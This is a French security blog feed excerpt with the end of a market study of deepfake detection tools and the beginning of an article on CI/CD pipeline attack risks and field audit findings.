<p style="text-align: justify;"><span data-contrast="auto">L’humain demeure la première cible et restait donc le premier rempart du système d’information pour lutter contre ce type d’attaques. Cependant, nous avons observé une évolution importante de la maturité de ces technologies sur cette dernière année et il devient de plus en plus difficile de distinguer le vrai du faux à l’œil nu. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Après avoir accompagné de nombreuses entreprises dans la formation et la sensibilisation de leurs collaborateurs à ces menaces, il nous a paru essentiel de mener une étude analysant l’outillage qui permettrait de renforcer leur défense. Disposer de solutions de détection de deepfakes fiables n’est plus seulement un enjeu technique : c’est une nécessité pour protéger le SI contre les intrusions, maintenir la confiance dans les échanges numériques et préserver la réputation des personnalités et des entreprises.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-28203 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive2-e1764165727521.jpg" alt="" width="610" height="393" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive2-e1764165727521.jpg 610w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive2-e1764165727521-296x191.jpg 296w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive2-e1764165727521-61x39.jpg 61w" sizes="auto, (max-width: 610px) 100vw, 610px" /></p>
<p style="text-align: justify;"><span data-contrast="auto">Notre </span><b><i><span data-contrast="auto">Radar des solutions de détection des deepfakes</span></i></b><span data-contrast="auto"> présente un panorama d’une trentaine d’acteurs que nous avons pu rencontrer. Ceux-ci proposent des solutions variées que nous avons rigoureusement évaluées afin d’identifier les premières tendances de ce marché naissant.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;" aria-level="1"><span data-contrast="auto">Pour mener ces tests techniques, certains acteurs ont mis à notre disposition une ou plusieurs versions de leur solution dans des environnements variés reflétant le déploiement habituel des solutions chez leurs clients. Nous avons alors construit une base de données de multiples contenus deepfake de typologie variée : type de média (audio seul, image, vidéo, interaction live) ; format (taille de l’échantillon, durée, extension) et outillage deepfake utilisé pour générer ces échantillons :</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:360,&quot;335559739&quot;:80}"> </span></p>
<p aria-level="1"> </p>
<p aria-level="1"><img loading="lazy" decoding="async" class="aligncenter wp-image-28216 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive4-e1764165023548.jpg" alt="" width="1052" height="140" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive4-e1764165023548.jpg 1052w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive4-e1764165023548-437x58.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive4-e1764165023548-71x9.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive4-e1764165023548-768x102.jpg 768w" sizes="auto, (max-width: 1052px) 100vw, 1052px" /></p>
<p style="text-align: justify;"><span data-contrast="auto">Pour extraire au mieux de ces tests les tendances du marché, nous avons considéré 3 critères d’évaluation distincts :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><span data-contrast="auto">La performance (capacité de détection des deepfakes, véracité des résultats sur les faux positifs, temps de réponse…)</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Le déploiement (facilité d’intégration dans un environnement client, aide au déploiement et documentation)</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">L’expérience utilisateur (compréhension des résultats, facilité d’utilisation de l’outil…)</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<h1 aria-level="1"> </h1>
<h1 style="text-align: justify;" aria-level="1"><span data-contrast="none">Un marché émergeant qui a déjà fait ses preuves en conditions réelles</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:360,&quot;335559739&quot;:80}"> </span></h1>
<h2 aria-level="2"> </h2>
<h2 style="text-align: justify;" aria-level="2"><span data-contrast="none">Deux technologies différentes pour atteindre le même objectif </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Nous avons en premier lieu catégorisé les différentes solutions proposées selon le type de contenu détecté :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><span data-contrast="auto">56% des solutions détectent à partir de </span><b><span data-contrast="auto">données visuelles du média</span></b><span data-contrast="auto"> (image, vidéo)</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">50% de solutions optent pour une détection à partir de </span><b><span data-contrast="auto">données audio</span></b><span data-contrast="auto"> (fichier audio simple ou audio d’une vidéo) </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="auto">Cette répartition homogène du choix de contenu à traiter nous permet d’étudier la performance de l’une ou l’autre des technologies. Si la plupart des solutions développées se repose sur des modèles d’intelligence artificielle entrainés pour classifier les contenus générés par de l’IA, le traitement d’un fichier visuel (type photo) ou d’un fichier audio (type mp3) diffère grandement dans les types modèles d’IA utilisés. Nous pourrions donc nous attendre à des différences de performance sur ces deux technologies.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Cependant, nos tests techniques montrent que la précision des solutions est relativement semblable que ce soit pour celles traitant de l’image ou de l’audio.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<table style="width: 100%;" data-tablestyle="MsoTableGrid" data-tablelook="1184" aria-rowcount="1">
<tbody>
<tr aria-rowindex="1">
<td style="width: 47.5%;" data-celllook="4369">
<p><b><span data-contrast="auto">92,5%</span></b><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
<p><span data-contrast="auto">Des images ou vidéos deepfake ont été détectées comme malveillantes par les solutions </span><b><span data-contrast="auto">traitant les images</span></b><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
</td>
<td style="width: 5.59524%;" data-celllook="4369">
<p style="text-align: center;"><b><span data-contrast="auto">VS</span></b></p>
</td>
<td style="width: 45.7143%;" data-celllook="4369">
<p><b><span data-contrast="auto">96%</span></b><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
<p><span data-contrast="auto">Des sources audio deepfake ont été détectées comme malveillantes par les solutions </span><b><span data-contrast="auto">traitant les audios</span></b><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;"><span data-contrast="auto">Il nous a paru également important de recenser les fournisseurs de solutions les plus matures qui cherchent maintenant à développer une capacité de détection des deepfakes sur des flux </span><b><span data-contrast="auto">audio ou vidéo en direct</span></b><span data-contrast="auto"> (avec moins de 10 secondes de traitement de la source), sources d’attaques les plus dangereuses aujourd’hui.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<table data-tablestyle="MsoTableGrid" data-tablelook="1184" aria-rowcount="1">
<tbody>
<tr aria-rowindex="1">
<td data-celllook="4369">
<p><b><span data-contrast="auto">19% </span></b><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:3,&quot;335551620&quot;:3,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:278}"> </span></p>
</td>
<td data-celllook="4369">
<p><b><span data-contrast="auto">Des solutions proposent une détection </span></b><b><span data-contrast="auto">en direct</span></b><b><span data-contrast="auto"> des deepfakes, intégrés dans les logiciels de visioconférence ou sur les appareils</span></b><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:64,&quot;335559739&quot;:160,&quot;335559740&quot;:278}"> </span></p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;" aria-level="2"><span data-contrast="auto">Celles-ci, traitant majoritairement l’audio, ont obtenu un score de précision de 73% des deepfake détectés comme tel. Cela montre la marge de progression possible pour ces jeunes acteurs dans la détection des attaques à la pointe de la technologie en direct.</span></p>
<p aria-level="2"> </p>
<h1 style="text-align: justify;" aria-level="2"><span data-contrast="none">Du PoC au déploiement at scale, un pas déjà franchi par certains</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h1>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">La maturité des solutions varie également sur notre radar. Si certains fournisseurs sont des start-ups émergeantes pour répondre à ce besoin spécifique, d’autres n’en sont pas à leur premier produit sur le marché. En effet, certaines entreprises rencontrées présentaient déjà des activités sur des domaines tels que l’identification biométrique, outil d’intelligence artificielle et même générateur de contenu multimédia par IA ! Ces acteurs avaient donc une connaissance et expérience suffisante pour proposer à leur client un service packagé, déployable sur un large périmètre ainsi qu’un support post-déploiement.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Néanmoins les startups plus jeunes gagnent également en maturité sur leurs services et permettent aussi d’aller au-delà de la phase de PoC en proposant aux entreprises différentes possibilités de déploiement :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><span data-contrast="auto">La requête API, intégrable dans d’autres softwares, reste la façon privilégiée d’appeler les services permettant la détection des deepfake ;</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Des plateformes GUI</span><span data-contrast="auto">6</span><span data-contrast="auto"> complètes en SaaS, certaines d’entre elles ayant déjà été déployées on-premise dans certains contextes, notamment en secteur bancaire ou de l’assurance ;</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Des conteneurs dockers on-device, permettant notamment d’ajouter des plug-ins à des périphériques audio, vidéo ou à des logiciels de vidéoconférence pour une intégration adaptée aux besoins spécifiques de détection.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<h1 aria-level="1"> </h1>
<h1 style="text-align: justify;" aria-level="1"><span data-contrast="none">Les cas d’usages des solutions de détection de deepfakes : tendances et évolution</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:360,&quot;335559739&quot;:80}"> </span></h1>
<p> </p>
<h2 style="text-align: justify;" aria-level="2"><span data-contrast="none">Des cas d’usages spécifiques aux besoins business critiques à protéger</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Pour s’adapter et répond</span><span data-contrast="auto">re aux attentes et besoins du marché, les éditeurs se sont spécialisés pour répondre à des cas d’usage précis. En plus de la réponse « deepfake ou contenu original ? », certains éditeurs développent et proposent des fonctionnalités supplémentaires pour cibler un usage spécifique de leur solution.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p><img loading="lazy" decoding="async" class="wp-image-28205 size-full aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive3-e1764165168297.jpg" alt="Répartition des solutions selon le cas business ciblé " width="463" height="267" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive3-e1764165168297.jpg 463w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive3-e1764165168297-331x191.jpg 331w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive3-e1764165168297-68x39.jpg 68w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive3-e1764165168297-120x70.jpg 120w" sizes="auto, (max-width: 463px) 100vw, 463px" /></p>
<p style="text-align: center;"><em>Figure 2 &#8211; Répartition des solutions selon le cas d&rsquo;usage business ciblé </em></p>
<p style="text-align: justify;"><span data-contrast="auto">Nous avons regroupé les différentes propositions des éditeurs en grandes catégories nous permettant de comprendre les tendances du marché :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><b><span data-contrast="auto">KYC et vérification d’identité</span></b><span data-contrast="auto"> : dans les processus d’onboarding bancaire ou d’ouverture de compte en ligne, la détection de deepfake permet de distinguer une véritable vidéo d’un usager d’une imitation générée par IA. Cela protège les institutions financières contre l’usurpation d’identité et le blanchiment d’argent. Ces solutions vont notamment pouvoir donner des scores de « liveness » ou de taux de correspondance à la personne devant être identifiée pour affiner la détection.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><b><span data-contrast="auto">Veille sur les réseaux sociaux et identification des sources </span></b><span data-contrast="auto">: Pour éviter que des faux médias ou informations ne viennent s’attaquer à la réputation de leur client, certains éditeurs de solution ont déployé des veilles sur les réseaux sociaux ou des outils d’analyse de contenu multimédia en pièce jointe de mail pour réagir rapidement. Les fonctionnalités de ces solutions permettent notamment de comprendre comment et par quel modèle de deepfake ces contenus malveillants ont été produits pour aider à tracer la source de l’attaque.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><b><span data-contrast="auto">Documents falsifiés et fraude à l’assurance</span></b><span data-contrast="auto"> : un certain nombre d’acteurs se sont tournés vers la lutte contre la fraude à l’assurance ou aux fausses pièces d’identité. Leurs solutions cherchent alors à détecter des altérations dans des pièces justificatives ou des photos de sinistres en mettant en évidence quelles parties de l’image d’origine ont été modifiées.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><b><span data-contrast="auto">Détection des arnaques téléphoniques et usurpation d’identité en appel vidéo </span></b><span data-contrast="auto">: ces types d’attaque se multiplient et reposent sur la création d’imitations réalistes de la voix ou du visage d’un dirigeant notamment pour tromper des collaborateurs et obtenir des virements ou informations sensibles. La majorité des systèmes de détection ciblant ces attaques ont développé des capacités d’intégration complète dans les logiciels d’appel vidéo ou sur les cartes sons des appareils à protéger.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="auto">Ainsi, chaque solution est pensée avec des fonctionnalités spécifiques, alignée sur les besoins du marché pour maximiser la pertinence et l’efficacité opérationnelle des solutions de détection.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p> </p>
<h2 style="text-align: justify;" aria-level="2"><span data-contrast="none">L’open-source comme initiateur, les solutions propriétaires pour prendre le relai</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Nous avons parlé jusqu’alors de solutions majoritairement propriétaires. Cependant, l’approche open-source existe bel et bien dans ce domaine. Ces initiatives jouent un rôle important dans la recherche académique et l’expérimentation, mais elles sont souvent moins performantes et moins robustes face à des deepfakes sophistiqués.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Si certaines proposent de très bons résultats sur des bancs de tests maitrisés (jusqu’à 90% de performance de détection</span><span data-contrast="auto">7</span><span data-contrast="auto">), les solutions propriétaires proposées par des éditeurs spécialisés offrent en général de meilleures performances en production. Elles se distinguent aussi par l’accompagnement : mises à jour régulières, support technique et services de maintenance, indispensables pour des environnements critiques comme la finance, l’assurance ou le secteur publique. Cette différence crée progressivement un écart entre la recherche open source et les offres commerciales, où la fiabilité et l’intégration en environnements complexes deviennent des arguments clés.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<h2 aria-level="2"> </h2>
<h2 style="text-align: justify;" aria-level="2"><span data-contrast="none">Les faux positifs, la limite qu’il reste à repousser</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Beaucoup d’éditeurs mettent en avant leur capacité de performance de détection de contenu deepfake. Il nous a paru important de prolonger les tests pour comprendre les performances de ces solutions sur les faux positifs : les contenus </span><b><span data-contrast="auto">réels</span></b><span data-contrast="auto"> sont-ils détectés comme du contenu naturel ou comme du contenu deepfake ?</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Les évaluations que nous avons menées sur plusieurs solutions de détection mettent en lumière des résultats contrastés selon les types de contenus. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><span data-contrast="auto">Pour l’image et la vidéo : près de 40 % des solutions testées rencontrent encore des difficultés à gérer correctement les faux positifs. Sur ces solutions, nous pouvons obtenir entre 50% et 70% des images réelles analysées considérées comme deepfake. Cela limite alors leur fiabilité notamment si elles sont soumises à de nombreux contenus. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Sur le volet audio, les solutions se distinguent avec des performances plus solides sur les faux positifs : seulement 7%. Seuls quelques échantillons particulièrement altérés (mais sans IA) ou de mauvaise qualité ont été détectés comme deepfake par certaines solutions.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="auto">Pour pallier ces problèmes, certains éditeurs cherchent à combiner le traitement image/vidéo et audio. Aujourd’hui, ces deux modalités demeurent le plus souvent traitées comme deux scores séparés, conservant généralement le score tendant le plus vers le contenu généré par IA. Des pistes d’amélioration sont en cours chez certains éditeurs pour </span><b><span data-contrast="auto">se servir de ces deux scores avec plus de complémentarité pour réduire les faux positifs</span></b><span data-contrast="auto">.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:142}"> </span></p>
<h1 aria-level="1"> </h1>
<h1 style="text-align: justify;" aria-level="1"><span data-contrast="none">Quel futur pour la détection de deepfakes?</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:360,&quot;335559739&quot;:80}"> </span></h1>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Les solutions actuelles ont démontré leur efficacité dans la plupart des conditions existantes aujourd’hui dans l’écosystème d’attaques deepfake. Cependant, dans un contexte où ces technologies et leurs utilisations se réinventent rapidement, les éditeurs vont devoir faire face à deux défis majeurs. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Le premier axe concerne l’efficacité face aux outils génératifs inconnus : si la maîtrise des technologies de génération les plus courantes est désormais bien établie, les écarts de performance apparaissent lorsqu’il s’agit de détecter des contenus produits par des technologies émergentes, moins documentées et plus opaques. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Le second axe clé réside dans la détection en temps réel. À ce jour, seulement 19 % des solutions intègrent de telles fonctionnalités, et même parmi celles-ci la performance observée demeure insuffisante pour répondre à ces besoins qui seront les vraies préoccupations de demain. Pour contraster ces propos, des progrès notables apparaissent déjà du côté de la détection audio, qui se profile comme une avancée prometteuse pour renforcer la sécurité dans des scénarios critiques de phishing ou fraude au président via appel audio deepfake.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">La maturité du marché dans ces technologies de pointe s’accélère, et tout laisse à penser que les solutions de détection rattraperont rapidement leur retard face aux dernières avancées en matière de création de deepfakes. Les prochaines années seront déterminantes pour voir émerger des outils plus fiables, plus rapides et mieux intégrés aux besoins métiers. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/11/radar-de-solutions-anti-deepfake-etude-de-lecosysteme-des-solutions-de-detection-de-contenu-genere-par-ia/">Radar de solutions anti-Deepfake :  étude de l’écosystème des solutions de détection de contenu généré par IA </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/11/radar-de-solutions-anti-deepfake-etude-de-lecosysteme-des-solutions-de-detection-de-contenu-genere-par-ia/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>CI/CD : la nouvelle pierre angulaire du SI ? </title>
		<link>https://www.riskinsight-wavestone.com/2025/09/ci-cd-la-nouvelle-pierre-angulaire-du-si/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/09/ci-cd-la-nouvelle-pierre-angulaire-du-si/#respond</comments>
		
		<dc:creator><![CDATA[Alexandre GUY]]></dc:creator>
		<pubDate>Tue, 16 Sep 2025 08:46:12 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[CI/CD]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[gestion des accès]]></category>
		<category><![CDATA[Gestion des risques]]></category>
		<category><![CDATA[IAM]]></category>
		<category><![CDATA[Risk management]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=27494</guid>

					<description><![CDATA[<p>Depuis l’expansion massive du DevOps, les chaînes d&#8217;intégration et de déploiement continu (CI/CD) sont devenues indispensables afin d’automatiser les cycles de développement d’applications. Tandis que l’intégration continue (CI) consiste à intégrer régulièrement du code et à le tester automatiquement, le...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/09/ci-cd-la-nouvelle-pierre-angulaire-du-si/">CI/CD : la nouvelle pierre angulaire du SI ? </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;"><span data-contrast="auto">Depuis l’expansion massive du DevOps, les </span><b><span data-contrast="none">chaînes d&rsquo;intégration</span></b><span data-contrast="auto"> et de </span><b><span data-contrast="none">déploiement continu</span></b><span data-contrast="auto"> (CI/CD) sont devenues indispensables afin d’automatiser les cycles de développement d’applications. Tandis que l’</span><b><span data-contrast="none">intégration continue</span></b><span data-contrast="auto"> (CI) consiste à intégrer régulièrement du code et à le tester automatiquement, le </span><b><span data-contrast="none">déploiement continu</span></b> <span data-contrast="auto">(CD) automatise l&rsquo;ensemble du processus de mise en production du code, permettant de s’assurer qu’il fonctionne correctement dans l&rsquo;environnement où il est déployé. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Les attaques impliquant ces chaînes d’approvisionnement introduisent de nouveaux risques dans les systèmes d’information. Des intrusions peuvent entraîner des </span><span data-contrast="none">fuites de</span> <span data-contrast="auto">propriété</span> <span data-contrast="auto">intellectuelle, des </span><span data-contrast="none">altérations de </span><span data-contrast="auto">code</span> <span data-contrast="auto">source, des interruptions</span> <span data-contrast="none">de service</span> <span data-contrast="none">ainsi que des </span><span data-contrast="auto">élévations de privilèges vers des parties plus critiques du SI. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Quels sont donc ces </span><b><span data-contrast="none">nouveaux vecteurs d’attaques</span></b> <span data-contrast="auto">sur les chaînes CI/CD et </span><b><span data-contrast="none">comment s’en protéger</span></b><span data-contrast="none"> </span><span data-contrast="auto">? Cet article vise à dresser un panorama de chemins de compromission observés sur le terrain, ainsi que des recommandations pour les contrer.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h1 style="text-align: justify;"><b><span data-contrast="auto">Quels risques pour les chaînes CI/CD ?</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h1>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">L&rsquo;attaque de </span><b><span data-contrast="none">SolarWinds</span></b><span data-contrast="auto"> en 2020 est un exemple qui ne cesse d’être énoncé, mais qui a mis en lumière l‘ampleur qu’une attaque de ce type peut causer. Après avoir vraisemblablement volé des identifiants FTP laissés en clair dans un ancien dépôt GitHub, </span><a href="https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-026/"><span data-contrast="none">l&rsquo;opération</span></a><span data-contrast="auto"> a exploité la chaîne d&rsquo;approvisionnement de SolarWinds en insérant un beacon C2 (Command &amp; Control) dans leur logiciel de gestion réseau, Orion, en amont du processus de signature.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Cette backdoor a permis aux attaquants d&rsquo;accéder aux réseaux internes de plusieurs agences gouvernementales américaines et entreprises privées, et ce, pendant </span><b><span data-contrast="none">plusieurs mois avant d&rsquo;être détectée</span></b><span data-contrast="auto">.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Cet incident, ainsi que des plus récents comme Log4Shell, Codecov et XZ Utils, ont non seulement souligné la nécessité d&rsquo;une sécurité accrue dans la chaîne CI/CD mais aussi celle d&rsquo;une réponse à incident beaucoup plus adaptative. L’OWASP présente de façon concrète un panorama des surfaces de risques les plus communes dans leur </span><a href="https://owasp.org/www-project-top-10-ci-cd-security-risks/"><span data-contrast="none">Top 10</span></a><span data-contrast="auto"> CI/CD Security.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-27500 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive1.png" alt="Fig 1 – Top 10 OWASP CICD-Sec " width="1280" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive1.png 1280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive1-340x191.png 340w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive1-69x39.png 69w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive1-768x432.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive1-800x450.png 800w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></p>
<p style="text-align: center;"><i><span data-contrast="auto">Fig 1 – Top 10 OWASP CICD-Sec</span></i><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:360}"> </span></p>
<h1> </h1>
<h1 style="text-align: justify;"><b><span data-contrast="auto">Quels retours terrain chez Wavestone ?</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h1>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Les audits et tests d’intrusion permettent de détecter des vulnérabilités de façon proactive avant qu’elles ne soient exploitées par des attaquants. En simulant de réelles attaques, ces évaluations offrent une perspective pratique sur la manière dont un système peut être compromis, ce qui permet d’appréhender plus concrètement les potentielles failles dans un système.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Les différentes interventions menées chez nos clients nous permettent de faire un constat clair :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul>
<li><span data-contrast="auto">Dans nos </span><b><span data-contrast="none">audits Cloud </span></b><span data-contrast="auto">et</span><b><span data-contrast="none"> CI/CD</span></b><span data-contrast="auto">, des vulnérabilités sont systématiquement trouvées au niveau des chaînes CI/CD, permettant dans la majorité des cas de prendre le contrôle de la chaîne, des artefacts, voire des infrastructures sous-jacentes. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">De même, au niveau de nos interventions </span><b><span data-contrast="none">CERT &amp; RedTeam</span></b><span data-contrast="auto">, nous observons que les chaînes CI/CD sont souvent utilisées comme accélérateur dans les chemins de compromission.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
